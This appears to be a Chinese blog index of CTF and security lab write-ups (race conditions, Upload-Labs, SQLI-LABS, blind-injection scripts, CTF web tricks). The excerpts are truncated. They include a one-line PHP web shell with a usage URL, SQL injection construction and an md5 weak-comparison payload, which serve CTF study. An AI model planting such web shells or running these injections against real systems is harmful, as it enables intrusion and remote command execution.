结合 CTF 详解条件竞争漏洞

什么是条件竞争漏洞？条件竞争漏洞是一种服务器端的漏洞，由于服务器端在处理不同用户的请求时是并发进行的，因此，如果并发处理不当或相关操作逻辑顺序设计的不合理时，将会导致此类问题的发生。漏洞分析假设有这么一个代码，实现用户上传图片功能<?php...

Uplode-Labs 通关笔记

漏洞类型分析漏洞类型判断简单 shell 制作shell.php<?php assert($_GET["cmd"])?>使用方法：http://104.36.68.99/upload/shell.php?cmd=phpinfo();P...

CTF 杂项题目总结（持续更新）

图片隐写

Xctf 练习题

1.view_source

密码学笔记

Md5md5 加密后的字符串格式为 16/32/64/128 位 16 进制数，且均由 0-9，A-F 组成。

SQLI-LABS 闯关笔记

Less-1?id=1'报错： near ''1'' LIMIT 0,1' at line 1推断查询语句为：$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";构造注入语句：用单引号闭合 id...

SQL 注入题目盲注爆破脚本

题目一：moctf 简单注入（盲注）一、猜表名import requestsimport rearr=[]t=0s=requests.session()for i in range(1,50): for j in range(32,126): ...

CTF WEB 常见思路

php 备份文件：1.index.php.bak2.index.php~3.index.php.swpmd5 比较弱比较：md5 弱比较，为 0e 开头的会被识别为科学记数法，结果均为 0代码：Payload：param1=QNKCDZO&...

安恒西湖论剑周周练

CRYPTO

Bugku-web 结题思路(持续更新)

1、web2：